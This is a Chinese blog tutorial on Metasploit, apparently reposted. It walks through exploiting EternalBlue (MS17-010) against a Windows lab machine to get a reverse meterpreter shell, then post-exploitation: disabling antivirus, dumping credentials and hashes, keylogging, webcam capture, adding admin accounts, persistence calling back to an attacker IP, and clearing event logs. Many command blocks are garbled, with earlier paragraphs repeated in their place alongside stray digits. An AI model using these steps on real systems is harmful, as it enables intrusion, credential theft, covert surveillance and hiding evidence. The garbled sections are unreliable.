正文

不夸张,一文秒懂MSF

admin
admin V管理员 /0 评论 /183 阅读
1213
此篇文章发布距今已超过444天,您需要注意文章的内容或图片是否可用!

实验环境

靶机:Windows 10虚拟机
攻击机:Kali虚拟机

简介

Metasploit Framework(MSF)是一款开源安全漏洞监测工具,该工具已附带数千个已知的软件漏洞,且仍在保持更新。
Metaploit可以用于信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被各大安全社区誉为"可以黑掉整个宇宙"初期的Metasploit是采用Perl语言编写的,但在后来的新版改成了Ruby。我们常用的kali中则自带了Metasploit工具。
本篇文章,我们以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,展开讲讲MSF框架的使用。

使用方法

1.基础使用

2.漏洞利用(exploit)

漏洞利用exploit,也就是我们常说的exp,它就是对漏洞进行攻击的代码。
先看看exploit漏洞利用模块路径(这里面有针对不同平台的exploit)
/usr/share/metasploit-framework/modules/exploits
进入Windows平台,在这里会列出针对Windows平台不同服务器的漏洞利用模块
再进入smb服务,这是Windows中经常爆出漏洞的服务,我们要讲的永恒之蓝漏洞就在这里,漏洞利用代码通常是以rb结尾的文件(matasploit是Ruby编写的)。

3.攻击载荷

payload:payload中包含攻击进入目标主机后需要在远程系统中运行的恶意代码,而Metasploit中的payload是一种特殊的模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。简而言之,这种漏洞利用模块可以访问目标系统,而其中的代码定义了payload在目标中的行为。
shellcode:shellcode是payload中的精髓部分,在渗透攻击时作为攻击载荷运行的一组机器指令。shellcode通常用汇编语言编写。在大多数情况下,目标系统执行了shellcode这一组指令之后,才会提供一个命令行shell。

3.1payload模块路径

/usr/share/metasploit-framework
/modules/payloads

3.2Metasploit中的payload模块主要类型

Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
在Metasploit中,我们可以通过Payload的名称和使用格式来推断它的类型
# Single Payload的格式为:
<target>/ <single>如:
Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>
如:Windows/meterpreter/reverse_tcp

  • 当我们在Metasploit中执行 show payloads命令之后,它会给我们显示一个可使用的Payload列表

  • 注意:

在这个列表中,像 windows/powershell_bind_tcp 就是一个Single Payload,它不包含Stage Payload。
而windows/meterpreter/reverse_tcp 则由一个Stage Payload(meterpreter)和 一个Stager Payload(reverse_tcp)组成。
Stager中几种常见的payload

正向连接使用场景

我们的攻击机在内网环境,被攻击机是外网环境,由于被攻击无法主动连接到我们的主机,所以就必须我们主动连接被攻击机了。但是这里经常遇到的问题是,被攻击机上开了防火墙,只允许指定的端口,比如对外开放了80端口。那么,我们就只能设置正向连接80端口了,这里很有可能失败,因为80端口上的流量太多了。

反向连接使用场景

我们的主机和被攻击机都在外网或者都在内网,这样被攻击机就能主动连接到我们的主机了。如果是这种情况,建议使用反向连接,因为反向连接的话,即使被攻击机开了防火墙也没事,防火墙只是阻止进入被攻击机的流量,而不会阻止被攻击机主动向外连接的流量。

反向连接80和443端口使用场景

被攻击机能够主动连接到我们的主机,还有就是被攻击机的防火墙设置的特别严格,就连被攻击机访问外部网络的流量也进行了严格的限制,只允许被攻击机的80端口或443端口与外部通信。

4.Meterpreter

Meterpreter属于stage payload,在Metasploit Framework中,Meterpreter是一种后渗透工具,它属于在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于"内存DLL注入"理念实现的。它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件。

4.1.Meterpreter是如何工作的

首先目标先要执行初始的溢出漏洞会话连接,可能是bind正向连接,或者反向reverse连接。反向连接的时候加载dll链接文件,同时后台悄悄处理dll文件。其次Meterpreter核心代码初始化,通过socket套接字建立一个TLS/1.0加密隧道并发送GET请求给Metasploit服务端。Metasploit服务端收到这个GET请求后就配置相应客户端。最后,Meterpreter加载扩展,所有的扩展被加载都通过TLS/1.0进行数据传输。

4.2Meterpreter的特点

  • Meterpreter完全驻留内存,没有写入到磁盘。

  • Meterpreter注入的时候不会产生新的进程,并可以很容易的移植到其他正在运行的进程。

  • 默认情况下,Meterpreter的通信是加密的,所以很安全。

  • 扩展性,许多新的特征模块可以被加载。

我们在设置payloads时,可以将payloads设置为:Windows/meterpreter/reverse_tcp,然后获得了
meterpreter> 之后我们就可以干很多事情了!具体做的事情,我们下面的后渗透阶段都有讲

5.MS17_010(永恒之蓝)

我们现在模拟使用MS17_010漏洞攻击,这个漏洞就是前些年危害全球的勒索病毒利用的永恒之蓝漏洞。

5.1 查找漏洞相关模块

5.2 搜索MS17_010漏洞

search ms17_010#利用search命令,搜索漏洞相关利用模块
这里找到了五个模块,前三个是漏洞利用,后两个是辅助模块,主要探测主机是否存在MS17_010漏洞。

5.3 利用Auxiliary辅助探测模块进行漏洞探测

Auxiliary辅助探测模块:
该模块不会直接在攻击机和靶机之间建立访问,它们只负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试。
使用smb_ms17_010漏洞探测模块进行探测
use auxiliary/scanner/smb
/smb_ms17_010
查看这个模块需要的配置信息
show options #查看这个模块需要配置的信息
设置需要探测的远程目标
set rhosts 192.168.10.30-192.168.10.50
对上述IP范围内的主机进行攻击
exploit
5.4 使用exploit漏洞利用模块进行利用
use exploit/windows/smb/ms17_010_eternalblue
查看这个漏洞的信息
/usr/share/metasploit-framework
/modules/payloads
0
查看可攻击的系统平台,显示当前攻击模块针对哪些特定操作系统版本、语言版本的系统
/usr/share/metasploit-framework
/modules/payloads
1
注意:这里只有一个,有些其他的漏洞模块对操作系统的语言和版本要求很严格,比如MS08_067,这样我们就要指定模板系统的版本。如果不设置,MSF会自动帮我们判断模板系统的版本和语言(利用目标系统的指纹特征)。

5.5 Payload攻击载荷模块

攻击载荷是我们期望在目标系统在被渗透攻击之后完成的实际攻击功能的代码,成功渗透目标后,用于在目标系统上运行的任意命令。
查看攻击载荷
show payloads # 该命令可以查看当前漏洞利用模块下所有的payload
设置攻击载荷
/usr/share/metasploit-framework
/modules/payloads
2
查看模块需要配置的参数
/usr/share/metasploit-framework
/modules/payloads
3
设置攻击载荷参数
set RHOST 192.168.10.42 # 设置RHOST,也就是被攻击的IP
set LHOST 192.168.10.37 # 设置LHOST,也就是我们的主机,用于接收从目标机弹回来的shell
set lport 1377 # 设置lport,也就是我们主机的端口,反弹shell到这个端口
进行攻击
exploit / run

后渗透阶段

运行exploit命令之后,我们开启了一个reverse tcp监听器来监听本地的1377端口,即我们攻击者本地主机的地址和端口号。运行成功之后,我们将会看到命令提示符 meterpreter >
我们输入 shell即可切换到目标主机的Windows cmd_shell里面
shell # 获取目标主机的cmd_shell
chcp 65001 # 这里为了避免目标主机cmd_shell字符乱码,设置目标主机命令行的字符编码
要想从目标主机shell退出到meterpreter,我们输入exit
从meterpreter退出MSF框架
/usr/share/metasploit-framework
/modules/payloads
4
查看前面获取到的meterpreter_shell 会话,最前面的数字是会话的ID
session -l
输入session [id号]即可进入响应的meterpreter_shell中
输入 shell即可进入cmd类型的控制,再输入 powershell,即可进入powershell类型的控制台
POST后渗透模块
该模块主要用于取得目标主机系统远程控制权后,进行一系列的后渗透攻击动作。
输入 sysinfo查看目标主机信息
/usr/share/metasploit-framework
/modules/payloads
5

查看主机是否运行在虚拟机上

/usr/share/metasploit-framework
/modules/payloads
6

关闭杀毒软件

/usr/share/metasploit-framework
/modules/payloads
7

获取目标主机的详细信息

/usr/share/metasploit-framework
/modules/payloads
8
它将目标机器上的常见信息收集起来然后下载保存在本地

访问文件系统

/usr/share/metasploit-framework
/modules/payloads
9

上传/下载文件

下载文件

Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
0

上传文件

Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
1

权限提升

有的时候,你可能会发现自己的Meterpreter会话受到了用户权限的限制,而这将会严重影响你在目标系统中的活动,比如:修改注册表、安装后门或盗取密码等活动,都需要提升用户权限,而Meterpreter给我们提供了一个getsystem命令,它可以使用多种技术在目标系统中实现提权。
Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
2

获取用户密码

抓取自动登录密码

很多用户习惯将计算机设置自动登录,可以使用 run windows/gather/credentials/windows_autologin抓取用户名和密码。
Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
3
这里是一个新环境。

导出密码哈希

Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
4
可以放入https://cmd5.com,进行破解hash

MSF自带kiwi模块抓取密码

kiwi模块
使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。
kiwi模块使用
提权到system权限进程迁移加载kiwi模块
Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
5

运行程序

查看目标主机上安装了哪些应用
Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
6
在meterpreter_shell命令执行目标系统中的应用程序
Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
7

屏幕截图

截图目标主机屏幕
Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
8

创建一个新账号

先查看目标主机有哪些用户
Single:是一种完全独立的payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非Metasploit处理工具所捕捉到。
Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:是Stager Payload下的一种Payload组件,这种payload可以提供更加高级的功能,而且没有大小限制。
9
在目标系统中创建一个新的用户方法一
# Single Payload的格式为:
<target>/ <single>如:
Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>
如:Windows/meterpreter/reverse_tcp
0
注:这个命令会创建用户,并把他添加到Administrators组中,这样该用户就拥有了管理员权限。
如果添加到Administrators组中失败了的话,我们可以进入到shell命令行窗口中,进行创建。
在目标系统的远程桌面组创建账号
# Single Payload的格式为:
<target>/ <single>如:
Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>
如:Windows/meterpreter/reverse_tcp
1

启用远程桌面

当我们新添加的用户已经拥有远程桌面之后,我们就可以使用这个账号凭据来开启远程桌面会话了。
首先,我们需要确保目标Windows设备开启了远程桌面功能(需要开启多个服务),我们输入:run post/windows/manage/enable_rdp 命令可以开启远程桌面。
在开启远程桌面会话之前,我们还需要使用idletime命令检查远程用户的空闲时长
idletime # 检查远程用户的空闲时长
开启远程桌面
# Single Payload的格式为:
<target>/ <single>如:
Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>
如:Windows/meterpreter/reverse_tcp
2

远程登录主机

键盘记录

Meterpreter还可以在目标设备上实现键盘记录功能,键盘记录功能主要涉及以下三种命令
keyscan_start # 开启键盘记录功能,开关键盘记录功能后目标输入的内容通过keyscan_dump查看
keyscan_dump # 显示捕捉到的键盘记录信息
keyscan_stop # 停止键盘记录功能

进程迁移

Meterpreter既可以单独运行,也可以与其他进程进行绑定。因此我们可以让Meterpreter与类似explorer.exe这样的程序进行绑定并以此来实现持久化。
可以使用getpid查看我们当前进程的ID
使用migrate+目标ID进程迁移进程
或者使用自动迁移进程命令 run post/windows/manage/migrate系统会自动寻找合适进程并迁移进程

禁止目标主机使用键盘鼠标

# Single Payload的格式为:
<target>/ <single>如:
Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>
如:Windows/meterpreter/reverse_tcp
3

用目标主机摄像头拍照

# Single Payload的格式为:
<target>/ <single>如:
Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>
如:Windows/meterpreter/reverse_tcp
4

常用的扩展库介绍

Meterpreter中不仅有基本命令还有很多扩展库。

load/use命令

# Single Payload的格式为:
<target>/ <single>如:
Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>
如:Windows/meterpreter/reverse_tcp
5
输入命令:load -l会列出所有可用的扩展
输入命令:load双击TAB键列出可用扩展

run命令

# Single Payload的格式为:
<target>/ <single>如:
Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>
如:Windows/meterpreter/reverse_tcp
6

run+双击Tab键,会列出所有的已有脚本

生成可持续后门
因为meterpreter是基于内存DLL建立的连接,所以,只要目标主机关机,我们的连接就会断。总不可能我们每次想连接的时候,每次都去攻击,然后再利用meterpreter建立连接。所以,我们得在目标主机系统内留下一个持续性的后门,只要目标主机开机了,我们就可以连接到该主机。
建立持续性后门有两种方法,一种是通过启动项(persistence),一种是通过服务启动(metsvc)
浏览器进入:MSF生成后门木马
https://www.cnblogs.com/trevain/p/13675241.html
然后放到Windows的启动目录中
C:Users$username$AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup
这样这个后门每次开机就都能够启动了,然后我们只要相连就能监听响应的端口就可以了。

服务器启动

通过服务器启动,我们可以运行命令
run exploit/windows/local/persistence lhost=192.168.10.39 lport=8888 # 自动连接192.168.10.39的8888端口,缺点容易被杀软查杀 # 然后它就在目标机新建了这个文件 C:windowsTEMP***.vbs,并把该服务加入了注册表,只要开机就会启动
我这里是没有放入后门文件的,所以这里是持久化失败。可以看到已经生成了一个VBScrip脚本
查看目标机的端口连接情况,就可以看到目标机连接了攻击者的8888端口,我这里没生成后门,所以不做演示。

设置socks代理

浏览器进入:内网渗透之代理转发
https://blog.csdn.net/whatday/article/details/112397088?ops_request_misc=%7B%22request%5Fid%22%3A%22164879326016780255214266%22%2C%22scm%22%3A%2220140713.130102334.pc%5Fall.%22%7D&request_id=164879326016780255214266&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-1-112397088.142^v5^pc_search_result_cache&utm_term=内网渗透之代理转发&spm=1018.2226.3001.4187

portfwd端口转发

portfwd是meterpreter提供的一种基本的端口转发。porfwd可以反弹单个端口到本地,并且监听,使用方法如下
# Single Payload的格式为:
<target>/ <single>如:
Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>
如:Windows/meterpreter/reverse_tcp
7
然后我们只要访问本地的9999端口就可以连接到目标主机的3389端口了
rdesktop 127.0.0.1:9999
因为通过端口转发功能已经把目标主机的3389端口流量转发到本地的9999端口了,所以直接连接本地的9999端口即可。
第一次连接,可能会有提示,需要信任证书,输入yes
如果不想继续连接的话,可以删除当前简历的连接,命令如下
portfwd delete -l 9999 -r 192.168.10.42 -p 3389
delete # 删除一个连接

清除事件日志

完成攻击操作之后,千万别忘了"打扫战场"。我们所有的操作记录都会被记录在目标系统的日志文件中,所以需要以下命令来清除事件日志
# Single Payload的格式为:
<target>/ <single>如:
Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>
如:Windows/meterpreter/reverse_tcp
8

导入并执行powershell脚本

如果powershell脚本是用于域内信息收集的,则获取到的权限用户需要是域用户
# Single Payload的格式为:
<target>/ <single>如:
Windows/powershell_bind_tcp
# Stager/Stage Payload的格式为:
<target>/ <stage> / <stager>
如:Windows/meterpreter/reverse_tcp
9

加载stdapi

有时候我们虽然获得了meterpreter,但是执行一些命令会显示没有该命令,这时候我们可以执行:load stdapi来加载,这样我们就可以执行命令了。注意:【旧版的msf存在这种问题,新版已无需扩展】

升级session

有时候,当我们收到的不是meterpreter类型的session的话,可能不好操作;比如webshell类型的session。我们可以执行sessions -u id来升级session。执行该命令,默认调用的是post/multi/manage/shell_to_meterpreter模块。
文章内容转自万径安全,侵删








推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
ZhouSa.com